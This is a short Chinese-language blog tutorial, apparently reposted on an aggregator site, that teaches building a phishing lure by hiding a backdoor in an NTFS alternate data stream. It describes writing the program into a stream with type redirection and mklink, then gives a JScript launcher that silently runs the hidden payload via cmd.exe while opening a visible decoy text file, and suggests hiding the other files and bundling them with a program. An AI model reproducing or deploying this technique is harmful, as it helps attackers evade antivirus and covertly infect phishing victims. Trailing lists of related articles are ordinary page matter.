制作ADS流文件进行钓鱼

2017 年 7 月 29 日 黑白之道 一把附魔钻石剑


大家好,我是Alex。今天教大家制作ADS流文件钓鱼,在windows下就可以完成了。随着杀毒软件功能的日益强大,病毒总会借助各式各样的隐藏手段来逃避杀毒软件的“追捕”。有些病毒会通过设置文件属性来隐藏自身,从而长期伏在计算机中,使自己很难被用户发现。一种更为隐蔽、危害性更大的隐藏方法逐渐被病毒利用,即利用NTFS数据流来隐藏病毒,此类病毒我们称之为ADS流病毒或ZeroAcess。


我们把后门放在文件夹下,并且新建一个txt文档



打开cmd使用type命令重定向,将程序写入文件流



使用mklink命令创建文件链接



然后新建一个用于显示的txt文档



最后,写一个JS文件

var objShell = newActiveXObject("shell.application");

objShell.ShellExecute("cmd.exe","/c alex.txt", "", "open", 0);

objShell.ShellExecute("2.txt","", "", "open", 1);



咱们执行一下!



(o゜▽゜)o☆[BINGO!]


PS:大家可以把除去显示的txt文档外其余所有文件隐藏,然后放入一个主程序


你会喜欢


震惊!某安全人员打击钓鱼网站

无需加载宏制作PPTX钓鱼

思路超前,Package 钓鱼


登录查看更多
1

相关内容

【2020新书】实战R语言4,323页pdf
专知会员服务
101+阅读 · 2020年7月1日
【实用书】学习用Python编写代码进行数据分析,103页pdf
专知会员服务
195+阅读 · 2020年6月29日
【实用书】Python爬虫Web抓取数据,第二版,306页pdf
专知会员服务
118+阅读 · 2020年5月10日
深度神经网络实时物联网图像处理,241页pdf
专知会员服务
77+阅读 · 2020年3月15日
PC微信逆向:两种姿势教你解密数据库文件
黑客技术与网络安全
16+阅读 · 2019年8月30日
已删除
AI掘金志
7+阅读 · 2019年7月8日
ISeeYou一款强大的社工工具
黑白之道
30+阅读 · 2019年5月17日
Kali Linux 渗透测试:密码攻击
计算机与网络安全
16+阅读 · 2019年5月13日
Python用于NLP :处理文本和PDF文件
Python程序员
4+阅读 · 2019年3月27日
基于Web页面验证码机制漏洞的检测
FreeBuf
7+阅读 · 2019年3月15日
DiscuzX 3.4 Phar反序列化漏洞
黑客工具箱
8+阅读 · 2019年1月4日
逆向 | C++ 加壳程序的编写思路
计算机与网络安全
9+阅读 · 2019年1月1日
Arxiv
92+阅读 · 2020年2月28日
VIP会员
相关VIP内容
相关资讯
PC微信逆向:两种姿势教你解密数据库文件
黑客技术与网络安全
16+阅读 · 2019年8月30日
已删除
AI掘金志
7+阅读 · 2019年7月8日
ISeeYou一款强大的社工工具
黑白之道
30+阅读 · 2019年5月17日
Kali Linux 渗透测试:密码攻击
计算机与网络安全
16+阅读 · 2019年5月13日
Python用于NLP :处理文本和PDF文件
Python程序员
4+阅读 · 2019年3月27日
基于Web页面验证码机制漏洞的检测
FreeBuf
7+阅读 · 2019年3月15日
DiscuzX 3.4 Phar反序列化漏洞
黑客工具箱
8+阅读 · 2019年1月4日
逆向 | C++ 加壳程序的编写思路
计算机与网络安全
9+阅读 · 2019年1月1日
Top
微信扫码咨询专知VIP会员